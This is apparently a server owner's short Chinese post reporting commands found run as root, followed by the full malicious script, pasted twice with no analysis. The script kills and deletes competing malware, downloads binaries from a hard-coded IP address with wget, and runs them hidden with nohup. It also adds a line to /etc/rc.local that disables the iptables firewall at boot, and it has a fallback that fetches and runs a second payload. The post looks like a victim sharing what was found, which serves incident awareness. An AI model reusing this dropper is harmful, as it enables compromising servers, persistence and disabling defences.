今天看服务器发现root下被执行了一大堆命令
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
killall lixtest
killall linuxx
killall ssh3
killall ssh4
killall ssh6
killall ssh-32
killall ssh-64
killall ssh-c4
killall java.13.2.8_11
killall drmc
killall tmpof
killall 1471
killall 1417
killall v432
killall v532
killall 29881
killall 10993
killall behsdf
killall helen
killall lampp
killall Umi34Ber
killall mysql.sock
killall x1
killall xxx
killall dos32
killall dos6
killall 007
killall t32
killall lq64
killall t64
killall lq32
killall java.132.8_11
killall 261180
killall sshbin
killall xudp
killall xupd1
killall xudp2
killall xudp3
killall xudp4
killall xudp5
killall .Mm2
killall .TSm
killall java.2.15.22_20
killall linuxssh
killall strutsbin
killall 266189
killall auto.bin
killall 3232
killall 6832
killall Dols3
killall huang
killall KDLinux
killall txma
killall xja
killall xjb
killall .IptabLex
rm -r -f 3232
rm -r -f 6832
rm -r -f Dols3
rm -r -f huang
rm -r -f KDLinux
rm -r -f txma
rm -r -f xja
rm -r -f xjb
rm -f -r /tmp/lixtest
rm -f -r /tmp/linuxx
rm -f -r /tmp/ssh3
rm -f -r /tmp/sh4
rm -f -r /tmp/ssh6
rm -f -r /tmp/ssh-32
rm -f -r /tmp/ssh-64
rm -f -r /tmp/ssh-c4
rm -f -r /tmp/drmc
rm -f -r /tmp/tmpof
rm -f -r /tmp/1471
rm -f -r /tmp/1417
rm -f -r /tmp/v432
rm -f -r /tmp/v532
rm -f -r /tmp/29881
rm -f -r /tmp/10993
rm -f -r /tmp/behsdf
rm -f -r /tmp/helen
rm -f -r /tmp/lampp
rm -f -r /tmp/Umi34Ber
rm -f -r /tmp/mysql.sock
rm -f -r /tmp/266189
rm -f -r /etc/x1
rm -f -r /etc/xxx
rm -f -r /etc/dos32
rm -f -r /etc/dos64
rm -f -r /etc/007
rm -f -r /etc/t32
rm -f -r /etc/lq64
rm -f -r /etc/t64
rm -f -r /etc/lq32
rm -f -r /etc/java.132.8_11
rm -f -r /etc/261180
rm -f -r /tmp/sshbin
rm -f -r /tmp/xudp
rm -f -r /tmp/xupd1
rm -f -r /tmp/xudp2
rm -f -r /tmp/xudp3
rm -f -r /tmp/xudp4
rm -f -r /tmp/xudp5
rm -f -r /tmp/java.2.15.22_20
rm -f -r /tmp/linuxssh
rm -f -r /tmp/strutsbin
rm -f -r /tmp/266189
rm -f -r etc/java.13.2.8_11
rm -f -r /etc/auto.bin
killall netstat.kv3Ads
rm -r -f /tmp/netstat.kv3Ads
find /etc/ -name "*.service2" -exec rm {} \;
killall idmapd.so.cp
rm -r -f /etc/idmapd/idmapd.so.cp
killall .idmapd_open
rm -r -f /etc/idmapd/.idmapd_open
mkdir /etc/idmapd
wget -O /etc/idmapd/.idmapd_open http://61.147.110.119:12340/110.119
chmod 0755 /etc/idmapd/.idmapd_open
nohup /etc/idmapd/.idmapd_open > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
myFile="/etc/idmapd/.idmapd_open"
if [ ! -f "$myFile" ]; then killall sess_7fd28830c68bc43b1e42a43b2e250715; rm -r -f /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; wget -O
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 http://61.147.110.119:12340/10991; chmod 0755 /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; nohup
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 > /dev/null 2>&1 & fi
rm -r -f java.pl
chmod 0644 /usr/bin/nohup
chmod 0644 /usr/bin/killall
exit
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
killall lixtest
killall linuxx
killall ssh3
killall ssh4
killall ssh6
killall ssh-32
killall ssh-64
killall ssh-c4
killall java.13.2.8_11
killall drmc
killall tmpof
killall 1471
killall 1417
killall v432
killall v532
killall 29881
killall 10993
killall behsdf
killall helen
killall lampp
killall Umi34Ber
killall mysql.sock
killall x1
killall xxx
killall dos32
killall dos6
killall 007
killall t32
killall lq64
killall t64
killall lq32
killall java.132.8_11
killall 261180
killall sshbin
killall xudp
killall xupd1
killall xudp2
killall xudp3
killall xudp4
killall xudp5
killall .Mm2
killall .TSm
killall java.2.15.22_20
killall linuxssh
killall strutsbin
killall 266189
killall auto.bin
killall 3232
killall 6832
killall Dols3
killall huang
killall KDLinux
killall txma
killall xja
killall xjb
killall .IptabLex
rm -r -f 3232
rm -r -f 6832
rm -r -f Dols3
rm -r -f huang
rm -r -f KDLinux
rm -r -f txma
rm -r -f xja
rm -r -f xjb
rm -f -r /tmp/lixtest
rm -f -r /tmp/linuxx
rm -f -r /tmp/ssh3
rm -f -r /tmp/sh4
rm -f -r /tmp/ssh6
rm -f -r /tmp/ssh-32
rm -f -r /tmp/ssh-64
rm -f -r /tmp/ssh-c4
rm -f -r /tmp/drmc
rm -f -r /tmp/tmpof
rm -f -r /tmp/1471
rm -f -r /tmp/1417
rm -f -r /tmp/v432
rm -f -r /tmp/v532
rm -f -r /tmp/29881
rm -f -r /tmp/10993
rm -f -r /tmp/behsdf
rm -f -r /tmp/helen
rm -f -r /tmp/lampp
rm -f -r /tmp/Umi34Ber
rm -f -r /tmp/mysql.sock
rm -f -r /tmp/266189
rm -f -r /etc/x1
rm -f -r /etc/xxx
rm -f -r /etc/dos32
rm -f -r /etc/dos64
rm -f -r /etc/007
rm -f -r /etc/t32
rm -f -r /etc/lq64
rm -f -r /etc/t64
rm -f -r /etc/lq32
rm -f -r /etc/java.132.8_11
rm -f -r /etc/261180
rm -f -r /tmp/sshbin
rm -f -r /tmp/xudp
rm -f -r /tmp/xupd1
rm -f -r /tmp/xudp2
rm -f -r /tmp/xudp3
rm -f -r /tmp/xudp4
rm -f -r /tmp/xudp5
rm -f -r /tmp/java.2.15.22_20
rm -f -r /tmp/linuxssh
rm -f -r /tmp/strutsbin
rm -f -r /tmp/266189
rm -f -r etc/java.13.2.8_11
rm -f -r /etc/auto.bin
killall netstat.kv3Ads
rm -r -f /tmp/netstat.kv3Ads
find /etc/ -name "*.service2" -exec rm {} \;
killall idmapd.so.cp
rm -r -f /etc/idmapd/idmapd.so.cp
killall .idmapd_open
rm -r -f /etc/idmapd/.idmapd_open
mkdir /etc/idmapd
wget -O /etc/idmapd/.idmapd_open http://61.147.110.119:12340/110.119
chmod 0755 /etc/idmapd/.idmapd_open
nohup /etc/idmapd/.idmapd_open > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
myFile="/etc/idmapd/.idmapd_open"
if [ ! -f "$myFile" ]; then killall sess_7fd28830c68bc43b1e42a43b2e250715; rm -r -f /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; wget -O
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 http://61.147.110.119:12340/10991; chmod 0755 /tmp/sess_7fd28830c68bc43b1e42a43b2e250715; nohup
/tmp/sess_7fd28830c68bc43b1e42a43b2e250715 > /dev/null 2>&1 & fi
rm -r -f java.pl
chmod 0644 /usr/bin/nohup
chmod 0644 /usr/bin/killall
exit
